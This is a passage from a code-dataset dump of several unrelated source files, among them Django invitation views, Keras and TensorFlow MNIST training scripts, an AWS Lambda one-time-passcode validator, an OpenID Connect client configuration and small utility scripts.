redirect('core:dashboard')\n\n\treturn render(\n\t\trequest,\n\t\t'core/invitation_expired.html',\n\t\t{\n\t\t\t'invitation': invitation,\n\t\t\t'headline': gs.invitation_expired_remove,\n\t\t\t'text': gs.invitation_expired_text.format(order_from.company, order_from.site),\n\t\t\t'cancel_text': gs.cancel,\n\t\t\t'order': order_from,\n\t\t\t'decline_text': gs.remove,\n\t\t\t'contact_person_text': gs.contact_person,\n\t\t\t'mobile_text': gs.mobile,\n\t\t}\n\t)\n\n@login_required\ndef invitation_finished(request, order_id):\n\tgs = Globalstrings()\n\torder = Order.objects.get(id=order_id)\n\tdocs = SiteDocuments.objects.filter(site = order.site)\n\t\n\treturn render(\n\t\trequest, \n\t\t'core/invitation_finished.html',\n\t\t{\n\t\t\t'order': order,\n\t\t\t'docs': docs,\n\t\t\t'headline': gs.site_accepted,\n\t\t\t'subheadline': gs.downloads,\n\t\t\t'next_text': gs.to_site,\n\t\t\t'downloads_text': gs.downloads,\n\t\t}\n\t)\n\t\ndef invitation_splitter(request, invitation_id):\n\tgs = Globalstrings()\n\tgv = Globalvars()\n\ttry:\n\t\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\texcept:\n\t\traise Http404(gs.unknown_invitation)\n\tinvitator = invitation.order_from.company.name\n\tsite = invitation.site.name\n\t\n\tif invitation.no_link:\n\t\treturn HttpResponseForbidden()\n\t\n\tif invitation.invitation_created <= gv.invitation_expired:\n\t\tinvitation.delete()\n\t\treturn render(\n\t\t\trequest,\n\t\t\t'core/new_invitation_expired.html',\n\t\t\t{\n\t\t\t\t'headline': gs.invitation_expired_headline,\n\t\t\t\t'content_text': gs.invitation_expired_text.format(invitator, site),\n\t\t\t}\n\t\t)\n\t\n\treturn render(\n\t\trequest, \n\t\t'core/invitation_splitter.html',\n\t\t{\n\t\t\t'headline': gs.order_invitation,\n\t\t\t'text': gs.order_invitation_text.format(invitator, invitation.invited_subcompany, site),\n\t\t\t'subheadline': gs.company_registered_headline,\n\t\t\t'question': gs.company_registered_text,\n\t\t\t'create_account': gs.create_account,\n\t\t\t'account_exists': gs.company_registered,\n\t\t\t'invitation': invitation,\n\t\t\t'please_logout_text': gs.please_logout_text,\n\t\t}\n\t)\n\t\ndef invitation_transfer(request, invitation_id):\n\tgs = Globalstrings()\n\tinvitation = OrderInvitation.objects.get(id=invitation_id)\n\tinvitator = invitation.order_from.company.name\n\tsite = invitation.site.name\n\tform = InvitationTransferForm()\n\t\n\tif invitation.no_link:\n\t\treturn HttpResponseForbidden()\n\t\n\tif request.method == 'POST':\n\t\tform = InvitationTransferForm(request.POST)\n\t\tif form.is_valid():\n\t\t\ttransfer_success = form.save(invitation)\n\t\t\tif transfer_success:\n\t\t\t\treturn redirect('core:index')\n\t\t\telse:\n\t\t\t\tmessages.error(request, gs.not_known_email)\n\t\t\t\t\n\t\n\treturn render(\n\t\trequest,\n\t\t'core/invitation_transfer.html',\n\t\t{\n\t\t\t'headline': gs.order_invitation,\n\t\t\t'text': gs.order_invitation_text.format(invitator, invitation.invited_subcompany, site),\n\t\t\t'subheadline': gs.invitation_transfer_headline,\n\t\t\t'question': gs.invitation_transfer_text,\n\t\t\t'transfer': gs.transfer,\n\t\t\t'form': form,\n\t\t\t'invitation': invitation,\n\t\t}\n\t)\n\t\nfrom django.db import transaction\n\nInviteSubcontractorFormset = formset_factory(\n\t\t\t\t\t\t\t\t\t\t\tform=InviteSubcontractorForm,\n\t\t\t\t\t\t\t\t\t\t\textra=1,\n\t\t\t\t\t\t\t\t\t\t\tmax_num=10,\n\t\t\t\t\t\t\t\t\t\t\tcan_delete=True\n\t\t\t\t\t\t\t\t\t\t\t)\nFORMS = [AssignEmployeesForm, InviteSubcontractorFormset, OrdernumberForm]\n\nclass InvitationWizard(SessionWizardView):\n\ttemplate_name = 'invitation_wizard.html'\n\tskip_steps = []\n\textra = ['1']\n\tsubs = []\n\t\t\n\tdef get_form_kwargs(self, step=None):\n\t\tkwargs = {}\n\t\tif step is None:\n\t\t\tstep = self.steps.current\n\t\tif step == '0':\n\t\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\t\tself.request.session['assign_type']='assign'\n\t\t\tkwargs.update(\n\t\t\t\t{\n\t\t\t\t\t'order': 'invitation',\n\t\t\t\t\t'request': self.request\t\t\t\t\t\n\t\t\t\t}\n\t\t\t)\n\t\treturn kwargs\n\t\t\n\tdef get_context_data(self, form, **kwargs):\n\t\tcontext = super(InvitationWizard, self).get_context_data(form, **kwargs)\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\torder_from = Order.objects.get(id=invitation.order_from_id)\n\t\tgs = Globalstrings()\n\t\tcontext.update(\n\t\t\t{\n\t\t\t\t'order': order_from,\n\t\t\t\t'headline': gs.accept_site,\n\t\t\t\t'cancel_text': gs.cancel,\n\t\t\t\t'skip_text': gs.skip,\n\t\t\t\t'next_text': gs.next,\n\t\t\t\t'complete_text': gs.complete,\n\t\t\t\t'invite_text': gs.invite_subcontractors_text,\n\t\t\t\t'company_text': gs.company,\n\t\t\t\t'contact_text': gs.contact_person,\n\t\t\t\t'subs': self.subs,\n\t\t\t\t'enter_ordernumber': gs.enter_ordernumber,\n\t\t\t}\n\t\t)\n\t\tif self.steps.current == '0':\n\t\t\tcontext.update({\n\t\t\t\t\t\t'subheadline': gs.assign_employees,\n\t\t\t\t\t\t})\n\t\telif self.steps.current == '1':\n\t\t\tcontext.update({\n\t\t\t\t\t\t'subheadline': gs.invite_subcontractors,\n\t\t\t\t\t\t})\n\t\telif self.steps.current == '2':\n\t\t\tcontext.update({\n\t\t\t\t\t\t'subheadline': gs.ordernumber,\n\t\t\t\t\t\t})\n\t\treturn context\n\t\n\tdef post(self, *args, **kwargs):\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\tdata = self.request.POST\n\t\tif 'Skip' in data:\n\t\t\tself.skip_steps.append(self.steps.current)\n\n\t\t\tform = self.get_form(data=self.request.POST, files=self.request.FILES)\n\t\t\tif self.steps.current == self.steps.last:\n\t\t\t\treturn self.render_done(form, **kwargs)\n\t\t\telse:\n\t\t\t\treturn self.render_next_step(form)\n\t\t\t\n\t\telif 'plus' in data:\n\t\t\textra = int(self.extra[0])\n\t\t\tself.extra[0] = str(extra + 1)\n\t\t\tInviteSubcontractorFormset = formset_factory(InviteSubcontractorForm, extra=extra)\n\t\t\tformset = InviteSubcontractorFormset()\n\t\t\tif extra == 1:\n\t\t\t\tsub = []\n\t\t\t\tsub.append(data['1-0-companyname'])\n\t\t\t\tsub.append(data['1-0-firstname'])\n\t\t\t\tsub.append(data['1-0-lastname'])\n\t\t\t\tsub.append(data['1-0-email'])\n\t\t\t\tself.subs.append(sub)\n\t\t\telse:\n\t\t\t\tself.subs.clear()\n\t\t\t\ti = 0\n\t\t\t\twhile i < extra:\n\t\t\t\t\tsub = []\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-companyname'])\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-firstname'])\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-lastname'])\n\t\t\t\t\tsub.append(data['form-'+str(i)+'-email'])\n\t\t\t\t\tself.subs.append(sub)\n\t\t\t\t\ti = i + 1\n\t\t\tform = self.get_form(data=self.request.POST, files=self.request.FILES)\n\n\t\t\treturn self.render(formset)\n\n\t\telif self.steps.current == '0':\n\t\t\tform = AssignEmployeesForm(self.request.POST, request=self.request, order='invitation')\n\t\t\tif form.is_valid():\n\t\t\t\tself.storage.set_step_data(self.steps.current, self.process_step(form))\n\t\t\t\treturn self.render_next_step(form)\n\t\t\n\t\treturn SessionWizardView.post(self, *args, **kwargs)\n\t\n\tdef render_done(self, form, **kwargs):\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\tfinal_forms = OrderedDict()\n\t\tfor form_key in self.get_form_list():\n\t\t\tif form_key in self.skip_steps:\n\t\t\t\tfinal_forms[form_key] = False\n\t\t\telif form_key == '0':\n\t\t\t\tform_obj = AssignEmployeesForm(self.storage.get_step_data(form_key), request=self.request, order='invitation')\n\t\t\t\tif not form_obj.is_valid():\n\t\t\t\t\treturn self.render_revalidation_failure(form_key, form_obj, **kwargs)\n\t\t\t\tfinal_forms[form_key] = form_obj\n\t\t\telse:\n\t\t\t\tform_obj = self.get_form(step=form_key,\n\t\t\t\t\tdata=self.storage.get_step_data(form_key))\n\t\t\t\tif not form_obj.is_valid():\n\t\t\t\t\treturn self.render_revalidation_failure(form_key, form_obj, **kwargs)\n\t\t\t\tfinal_forms[form_key] = form_obj\n\t\tdone_response = self.done(final_forms.values(), form_dict=final_forms, **kwargs)\n\t\tself.storage.reset()\n\t\treturn done_response\n\t\n\tdef done(self, form_list, **kwargs):\n\t\tself.extra=['1']\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\torder = OrderManager.make_order_from_invitation(self.request, invitation)\n\t\titr = 0\n\t\tfor form in form_list:\n\t\t\titr += 1\n\t\t\tif not form:\n\t\t\t\tcontinue \n\t\t\tif itr == 1:\n\t\t\t\tif form.is_valid() and not form.empty_permitted:\n\t\t\t\t\tfor field, value in form.cleaned_data.items():\n\t\t\t\t\t\tif field == 'employees':\n\t\t\t\t\t\t\tfor employee in value:\n\t\t\t\t\t\t\t\tform.save(order, employee, [])\n\t\t\telif itr == 2:\n\t\t\t\tfor inner_form in form:\n\t\t\t\t\tif inner_form.is_valid():# and not inner_form.empty_permitted:\n\t\t\t\t\t\tinner_form.save(self.request, order)\n\t\t\telse:\n\t\t\t\tif form.is_valid():\n\t\t\t\t\tform.save(order)\n\t\tinvitation.delete()\n\t\treturn redirect('/invitation/' + str(order.id) + '/finished/')\n\t\t","sub_path":"opticon/core/views/invitation.py","file_name":"invitation.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"156591540","text":"import argparse\nfrom htmlmash import load_template\n\nparser = argparse.ArgumentParser(prog='htmlmash', description=\"Process and print template\")\nparser.add_argument(\"template\", help=\"htmlmash template file\")\nargs = parser.parse_args()\ntry:\n template = load_template(args.template)\n print(template)\nexcept FileNotFoundError:\n exit(2)\n","sub_path":"htmlmash/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"195399839","text":"#!/usr/bin/python3\n\nfrom keras import models\nfrom keras import layers\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nprint(\"Shape of train data: {}\".format(train_images.shape))\nprint(\"Number of train labels: {}\".format(len(train_labels)))\nprint(\"Exampes of train labels: {}\".format(train_labels))\n\nprint(\"Shape of test data: {}\".format(test_images.shape))\nprint(\"Number of test labels: {}\".format(len(test_labels)))\nprint(\"Exampes of test labels: {}\".format(test_labels))\n\n# preprocess data\ntrain_images = train_images.reshape((60000, 28 * 28))\ntrain_images = train_images.astype('float32') / 255\n\ntest_images = test_images.reshape((10000, 28 * 28))\ntest_images = test_images.astype('float32') / 255\n\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\n\n# build the network\nnetwork = models.Sequential()\nnetwork.add(layers.Dense(512, activation='relu', input_shape=(28 * 28,)))\nnetwork.add(layers.Dense(10, activation='softmax'))\n\n# compile the network\nnetwork.compile(\n optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n# train the network\nnetwork.fit(train_images, train_labels, epochs=5, batch_size=128)\n\n# evaluate the network\ntest_loss, test_acc = network.evaluate(test_images, test_labels)\nprint(\"Accuracy on test set: {:.2%}\".format(test_acc))\n","sub_path":"scripts/2.1-a-first-look-at-a-neural-network.py","file_name":"2.1-a-first-look-at-a-neural-network.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90986742","text":"#encoding:utf-8\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport datetime as dt\nimport numpy as np\nimport pickle as pkl\nfrom functools import partial\n\nEPOCHS = 3\nBATCH_SIZE = 100\nLEARNING_RATE = 0.001\nALPHA = 0.01\n\ndef generator(randomData, alpha, reuse=False):\n with tf.variable_scope('GAN/generator', reuse=reuse):\n h1 = tf.layers.dense(randomData, 256, activation=partial(tf.nn.leaky_relu, alpha=alpha))\n o1 = tf.layers.dense(h1, 784, activation=None)\n img = tf.tanh(o1)\n return img\n\ndef discriminator(img, alpha, reuse=False):\n with tf.variable_scope('GAN/discriminator', reuse=reuse):\n h1 = tf.layers.dense(img, 128, activation=partial(tf.nn.leaky_relu, alpha=alpha))\n D_logits = tf.layers.dense(h1, 1, activation=None)\n D = tf.nn.sigmoid(D_logits)\n return D, D_logits\n\nif __name__ == '__main__':\n tstamp_s = dt.datetime.now().strftime(\"%H:%M:%S\")\n mnist = input_data.read_data_sets('MNIST_DataSet')\n ph_realData = tf.placeholder(tf.float32, (BATCH_SIZE, 784))\n ph_randomData = tf.placeholder(tf.float32, (None, 100))\n gimage = generator(ph_randomData, ALPHA)\n real_D, real_D_logits = discriminator(ph_realData, ALPHA)\n fake_D, fake_D_logits = discriminator(gimage, ALPHA, reuse=True)\n\n d_real_xentropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=real_D_logits, labels=tf.ones_like(real_D))\n loss_real = tf.reduce_mean(d_real_xentropy)\n\n d_fake_xentropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_D_logits, labels=tf.zeros_like(fake_D))\n loss_fake = tf.reduce_mean(d_fake_xentropy)\n\n d_loss = loss_real + loss_fake\n g_xentropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_D_logits, labels=tf.ones_like(fake_D))\n g_loss = tf.reduce_mean(g_xentropy)\n\n d_training_parameter = [trainVar for trainVar in tf.trainable_variables() if 'GAN/discriminator/' in trainVar.name]\n g_training_parameter = [trainVar for trainVar in tf.trainable_variables() if 'GAN/generator/' in trainVar.name]\n d_optimize = tf.train.AdamOptimizer(LEARNING_RATE).minimize(d_loss, var_list=d_training_parameter)\n g_optimize = tf.train.AdamOptimizer(LEARNING_RATE).minimize(g_loss, var_list=g_training_parameter)\n batch = mnist.train.next_batch(BATCH_SIZE)\n save_gimage = []\n save_loss = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for e in range(EPOCHS):\n for i in range(mnist.train.num_examples//BATCH_SIZE):\n batch = mnist.train.next_batch(BATCH_SIZE)\n batch_images = batch[0].reshape((BATCH_SIZE, 784))\n batch_images = batch_images * 2 - 1\n batch_z = np.random.uniform(-1,1,size=(BATCH_SIZE, 100))\n sess.run(d_optimize, feed_dict={ph_realData:batch_images, ph_randomData:batch_z})\n sess.run(g_optimize, feed_dict={ph_randomData:batch_z})\n train_loss_d = sess.run(d_loss, {ph_randomData: batch_z, ph_realData:batch_images})\n train_loss_g = g_loss.eval({ph_randomData:batch_z})\n print('{0} Epoch={1}/{2}, DLoss={3:.4F}, GLoss={4:.4F}'.format(dt.datetime.now().strftime(\"%H:%M:%S\"), e+1, EPOCHS, train_loss_d, train_loss_g))\n save_loss.append((train_loss_d, train_loss_g))\n randomData = np.random.uniform(-1,1,size=(25,100))\n gen_samples = sess.run(generator(ph_randomData, ALPHA, True), feed_dict={ph_randomData:randomData})\n save_gimage.append(gen_samples)\n with open('save_gimage.pkl', 'wb') as f:\n pkl.dump(save_gimage, f)\n with open('save_loss.pkl', 'wb') as f:\n pkl.dump(save_loss, f)\n tstamp_e = dt.datetime.now().strftime(\"%H:%M:%S\")\n time1 = dt.datetime.strptime(tstamp_s, \"%H:%M:%S\")\n time2 = dt.datetime.strptime(tstamp_e, \"%H:%M:%S\")\n print(\"開始:{0}, 終了:{1}, 処理時間:{2}\".format(tstamp_s, tstamp_e, (time2 - time1)))\n","sub_path":"mnist_v1/gan_mnist.py","file_name":"gan_mnist.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"285053091","text":"import json\nimport boto3\nimport base64\nfrom botocore.vendored import requests\nfrom boto3.dynamodb.conditions import Key, Attr\n\ndef getName(faceId) :\n dynamo_client = boto3.resource('dynamodb')\n visitors_table = dynamo_client.Table('visitors');\n response = visitors_table.query(KeyConditionExpression=Key('faceID').eq(faceId))\n nameInput = response['Items'][0]['name']\n return nameInput\n\ndef validate_otp(otp):\n if otp==\"\":\n return \"Permission Denied\"\n dynamo_client = boto3.resource('dynamodb')\n visitors_table = dynamo_client.Table('passcodes');\n response = visitors_table.query(IndexName='otp-index', KeyConditionExpression=Key('otp').eq(otp))\n if len(response['Items'])==0:\n return \"Permission Denied\"\n faceID_val = response['Items'][0]['faceId']\n return \"Welcome \"+getName(faceID_val)\n\ndef lambda_handler(event, context):\n print(\"THis is the event\",event)\n otp = event['otp']\n # otp = \"124\"\n print(\"This is the otp :\",otp)\n message = validate_otp(otp)\n return {\n 'statusCode': 200,\n 'body': message\n }\n","sub_path":"lambdas/LF0.py","file_name":"LF0.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292261212","text":"class Model:\n \"\"\" from nanopolish: // as per ONT documents\n scaled_states[i].level_mean = states[i].level_mean * scale + shift;\n scaled_states[i].level_stdv = states[i].level_stdv * var;\n scaled_states[i].sd_mean = states[i].sd_mean * scale_sd;\n scaled_states[i].sd_lambda = states[i].sd_lambda * var_sd;\n scaled_states[i].update_sd_stdv();\"\"\"\n def __init__(self,model_list):\n self.model = {}\n self.kmers = [k[0] for k in model_list]\n self.means = [k[1] for k in model_list]\n self.stds = [k[2] for k in model_list]\n self.model = {kmer:(mean,std) for kmer,mean,std in zip(self.kmers,self.means,self.stds)}\n\ndef extract_model(hdf5,loc='Analyses/Basecall_1D_000/BaseCalled_template'):\n \"\"\"returns template strand ONT model as k-mer dict\"\"\"\n location = loc+\"/Model\"\n try:\n kmer_list = [(a[0],a[1],a[2]) for a in hdf5[location].value]\n mod = Model(kmer_list)\n return mod\n except KeyError:\n return None\n\n\n","sub_path":"R7_mCaller/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"1047795","text":"from random import randrange\nimport IPython\n\n#Orthagonal neighbours, not diagnonal\nneighbours = [\n [-1, 0], [1, 0], #X coord neighbours\n [0, -1], [0, 1] #Y coord neighbours\n]\n\nclass Grid:\n \"\"\" A 2D Grid Generator \"\"\"\n\n def __init__(self, size, maxcost=10):\n self.grid = []\n for y in range(size):\n self.grid.append([])\n for x in range(size):\n self.grid[y].append(randrange(0, maxcost))\n\n def __repr__(self):\n outstr = \"\"\n xSize, ySize = self.size()\n for i, line in enumerate(self.grid):\n for j, pos in enumerate(line):\n if (i, j) == (0, 0) or (i, j) == (xSize - 1, ySize - 1):\n outstr += \"^{}^ \".format(str(pos))\n else:\n outstr += \"|{}| \".format(str(pos))\n outstr += \"\\n\"\n return outstr\n\n def repr_path(self, path):\n outstr = \"\"\n for i, line in enumerate(self.grid):\n for j, pos in enumerate(line):\n if (i, j) in path:\n outstr += \"^{}^ \".format(str(pos))\n else:\n outstr += \"|{}| \".format(str(pos))\n outstr += \"\\n\"\n return outstr\n\n def size(self):\n return (len(self.grid), len(self.grid[0]))\n\n\n def __getitem__(self, n):\n return self.grid[n]\n\n def get(self, locTuple):\n assert(isinstance(locTuple, tuple))\n return self.grid[locTuple[0]][locTuple[1]]\n\n def neighbours(self, locTuple):\n assert(isinstance(locTuple, tuple))\n x,y = locTuple\n xSize, ySize = self.size()\n local_neighbours = []\n for xMod, yMod in neighbours:\n xPrime = x + xMod\n yPrime = y + yMod\n if 0 <= xPrime < xSize and \\\n 0 <= yPrime < ySize:\n local_neighbours.append((xPrime, yPrime))\n return local_neighbours\n","sub_path":"python/misc_tests/pyAStar/pyAStar/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"452991172","text":"import urllib2\n\n#url = \"https://www.dropbox.com/s/g34dv4saey56nt6/Illiad%20ex?dl=1\"\nurl = \"https://www.dropbox.com/s/jvvh5a3wdwe7k3o/test?dl=1\"\n#url = \"https://www.google\"\nu = urllib2.urlopen(url)\nmeta = u.info()\nfile_size = int(meta.getheaders(\"Content-Length\")[0])\nif file_size > 100000:\n pass\nl = \"\"\nfile_size_dl = 0\nblock_sz = 8192\nwhile True:\n buffer = u.read(block_sz)\n if not buffer:\n break\n\n l += buffer\n\nl = l.splitlines()\n#O(n^2) but readable\nfor i in list(l):\n stripped = i.strip(\" \")\n if stripped == \"\":\n l.remove(i)\n","sub_path":"anny3/web_file_loader.py","file_name":"web_file_loader.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50921902","text":"#!/usr/bin/python3\n\n# 1c-moy.py\n# Ask for mark and name then do average and top 5\n# Anthony DOMINGUE\n# 15/10/2018\n\nimport re\n\npattern = '^[A-z]*\\/[0-9]*$' # Regex to check input\ntmp = 0 # Init of tmp variable used to do the average\naverage = 0\ntest_dict = {} # Init of the dictionary with names and marks\n\nuser_entry = input(\"Name/Mark:\")\n\nwhile user_entry != 'q':\n\n while not re.match(pattern, user_entry):\n user_entry = input(\"Invalid input, must be ^[A-z]*\\/[0-9]*$:\")\n\n # If the input is valid we can safely split string into list \n name = user_entry.split('/')[0]\n mark = user_entry.split('/')[1]\n\n \"\"\"\n Now we can add the mark to the dictionary with name as keys\n __ \n | | \n | | I want to use dictionary to practice \n | | It is not possible to use the same key twice\n |__| As we use name as keys we can not use the same name twice\n __ So if there is two John, we must use JohnA JohnB\n |__| \n \n \"\"\"\n test_dict[name] = mark\n\n user_entry = input(\"Name/Mark:\")\n\n# Check if the user gave us at least one couple\nif len(test_dict) > 0:\n # When we have all we process the average\n for name in test_dict:\n tmp += int(test_dict[name])\n average = tmp / len(test_dict)\n print(\"Average is : \", average)\n\n \"\"\"\n Here we sort the dictionary (testDict) to order the values (key=testDict.__getitem__)\n by descending order (reverse=True). It give use a list of names, and so keys,\n ordered by the value assigned to the keys in the dictionary\n \"\"\"\n names = sorted(test_dict, key=test_dict.__getitem__, reverse=True)\n i = 0\n\n # Show the top 5\n for name in names:\n if i > 4:\n break\n # Here we show the rank with i+1, the name from the list and the value from the dictionary with the name as keys\n print(\"#\", i + 1, \" \", name, \" with \", test_dict[name])\n i += 1\nelse:\n print(\"Ciao\")\n","sub_path":"scripts/1c-moy.py","file_name":"1c-moy.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"78501149","text":"PORT = 8090\nBASEURL = \"https://127.0.0.1:{}\".format(PORT)\n\n# If BASE is https these has to be specified\nSERVER_CERT = \"certs/cert.pem\"\nSERVER_KEY = \"certs/key.pem\"\nCA_BUNDLE = None\n\n# This is just for testing an local usage. In all other cases it MUST be True\nVERIFY_SSL = False\n\nKEYDEFS = [{\"type\": \"RSA\", \"key\": '', \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]}]\n\nHTML_HOME = 'html'\n\nSECRET_KEY = 'secret_key'\nSESSION_COOKIE_NAME = 'rp_session'\n\nPREFERRED_URL_SCHEME = 'https'\n\nOIDC_KEYS = {\n 'private_path': \"./priv/jwks.json\",\n 'key_defs': KEYDEFS,\n 'public_path': './static/jwks.json'\n}\n\nPUBLIC_JWKS_PATH = '{}/{}'.format(BASEURL, OIDC_KEYS['public_path'])\n\n# # information used when registering the client, this may be the same for all OPs\n#\nDEFAULT_CLIENT_PREFS = {\n \"application_type\": \"web\", \"application_name\": \"rphandler\",\n \"contacts\": [\"ops@example.com\"],\n \"response_types\": [\"code\"],\n \"scope\": [\"openid\", \"profile\", \"email\", \"address\", \"phone\"],\n \"token_endpoint_auth_method\": [\"client_secret_basic\",\n 'client_secret_post']\n}\n\n# Default set if nothing else is specified\nDEFAULT_SERVICES = {\n 'ProviderInfoDiscovery': {}, 'Registration': {},\n 'Authorization': {}, 'AccessToken': {},\n 'RefreshAccessToken': {}, 'UserInfo': {},\n 'EndSession': {}\n}\n\nCLIENT_CONFIG = {\n 'client_preferences': DEFAULT_CLIENT_PREFS,\n 'services': DEFAULT_SERVICES\n}\n\n# The keys in this dictionary are the OPs short user friendly name\n# not the issuer (iss) name.\n# The special key '' is ued for OPs that support dynamic interactions.\n\nCLIENTS = {\n # The ones that support web finger, OP discovery and client registration\n # This is the default, any client that is not listed here is expected to\n # support dynamic discovery and registration.\n \"\": CLIENT_CONFIG,\n \"filip\": {\n 'issuer': \"https://guarded-cliffs-8635.herokuapp.com/\",\n \"redirect_uris\": [\"{}/authz_cb/filip\".format(BASEURL)],\n \"post_logout_redirect_uris\": [\"{}/session_logout\".format(BASEURL)],\n \"client_preferences\": DEFAULT_CLIENT_PREFS,\n \"services\": DEFAULT_SERVICES,\n # \"backchannel_logout_session_required\": True,\n \"backchannel_logout_uri\": \"{}/bc_logout\".format(BASEURL)\n },\n \"flop\": {\n 'issuer': \"https://127.0.0.1:5000/\",\n \"redirect_uris\": [\"{}/authz_cb/flop\".format(BASEURL)],\n \"post_logout_redirect_uris\": [\"{}/session_logout\".format(BASEURL)],\n \"client_preferences\": DEFAULT_CLIENT_PREFS,\n \"services\": DEFAULT_SERVICES,\n # \"backchannel_logout_session_required\": True,\n \"backchannel_logout_uri\": \"{}/bc_logout/flop\".format(BASEURL)\n },\n \"filip_local\": {\n 'issuer': \"http://localhost:3000/\",\n \"redirect_uris\": [\"{}/authz_cb/filip_local\".format(BASEURL)],\n \"post_logout_redirect_uris\": [\"{}/session_logout\".format(BASEURL)],\n \"client_preferences\": DEFAULT_CLIENT_PREFS,\n \"services\": DEFAULT_SERVICES,\n # \"backchannel_logout_session_required\": True,\n \"backchannel_logout_uri\": \"{}/bc_logout\".format(BASEURL)\n },\n 'bobcat': {\n 'issuer': 'https://127.0.0.1:8443/',\n \"client_id\": \"client3\",\n \"client_secret\": \"2222222222222222222222222222222222222222\",\n \"redirect_uris\": [\"{}/authz_cb/bobcat\".format(BASEURL)],\n \"client_preferences\": {\n \"response_types\": [\"code\"],\n \"scope\": [\"openid\", \"offline_access\"],\n \"token_endpoint_auth_method\": \"client_secret_basic\"\n },\n \"services\": {\n 'ProviderInfoDiscovery': {}, 'Authorization': {}, 'AccessToken': {},\n 'RefreshAccessToken': {}\n }\n }\n}\n\n# Whether an attempt to fetch the userinfo should be made\nUSERINFO = True\n","sub_path":"flask_rp/bc_conf.py","file_name":"bc_conf.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"202284856","text":"#!/usr/bin/env python3\n\"\"\"Test suite for the migrator tool.\"\"\"\n\nfrom argparse import Namespace\nfrom pathlib import Path\nimport shutil\nimport tempfile\nimport unittest\n\nimport migrator\n\n\nclass TestMigrator(unittest.TestCase):\n \"\"\"Test the migrator.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the temp directory to use for the tests.\"\"\"\n self.dir = tempfile.mkdtemp()\n migrator.MIGRATIONS_PATH = Path(self.dir)\n\n def tearDown(self):\n \"\"\"Remove the temp directory we used for the tests.\"\"\"\n shutil.rmtree(self.dir)\n\n def create_test_runner(self, parameters, environment):\n \"\"\"Run create test for a given environment.\"\"\"\n args = Namespace()\n args.name = 'test'\n args.environments = [environment]\n migrator_dir = Path(self.dir, environment)\n migrator_dir.mkdir()\n migrator.create(args)\n expected = \"\"\"def up({0}):\n pass\n\n\ndef down({0}):\n pass\"\"\".format(', '.join(parameters))\n for entry in migrator_dir.iterdir():\n with entry.open() as open_file:\n self.assertEqual(expected, open_file.read())\n\n def test_create_system(self):\n \"\"\"Test the create commmand for system environment.\"\"\"\n parameters = ['config']\n environment = 'system'\n self.create_test_runner(parameters, environment)\n\n def test_create_master(self):\n \"\"\"Test the create command for the master environment.\"\"\"\n parameters = ['config', 'conn']\n environment = 'master'\n self.create_test_runner(parameters, environment)\n\n def test_create_course(self):\n \"\"\"Test the create command for the course environment.\"\"\"\n parameters = ['config', 'conn', 'semester', 'course']\n environment = 'course'\n self.create_test_runner(parameters, environment)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"migration/test_migrator.py","file_name":"test_migrator.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605465277","text":"class Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def add(self, value):\r\n self.next = Node(value)\r\n\r\n\r\ndef find_middle(node):\r\n print(f\"starting at {node.value}\")\r\n hare = node\r\n tortoise = node\r\n while hare is not None and hare.next is not None:\r\n print(hare.value)\r\n hare = hare.next.next\r\n print(hare.value)\r\n tortoise = tortoise.next\r\n return tortoise\r\n\r\n\r\nnode1 = Node(1)\r\ni = 0\r\ncurrent = node1\r\nwhile i < 50:\r\n current.add(i)\r\n current = current.next\r\n i += 1\r\n\r\nprint(f\"the middle is: 